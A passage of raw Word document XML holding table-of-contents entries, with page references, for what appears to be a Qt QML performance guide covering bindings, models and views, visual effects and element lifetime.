            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605287 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>123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88" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Type-Conversion</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605288 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>124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89" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Resolving Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605289 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>125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90" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605290 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>127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291" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sequence tips</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605291 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>128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92" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Value-Type tips</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605292 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>132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93" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other JavaScript Objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605293 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>132</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294" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Common Interface Elements</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605294 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>132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95" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text Elements</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605295 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>132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296" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Images</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605296 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133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297" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Asynchronous Loading</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605297 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133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298" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Explicit Source Size</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605298 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133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299" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Avoid Run-time Composition</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605299 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133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00" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Position Elements With Anchors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605300 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>133</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01" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Models and Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605301 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>135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02" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Custom C++ Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605302 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>135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03" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605303 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>135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04" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Populate Within A Worker Thread</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605304 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>135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05" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Don't Use Dynamic Roles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605305 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>136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06" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605306 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>136</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07" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual Effects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605307 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>137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08" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605308 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>137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09" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605309 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>137</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10" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Controlling Element Lifetime</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605310 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>137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11" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Lazy Initialization</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605311 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>138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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using Loader</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605312 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>138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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
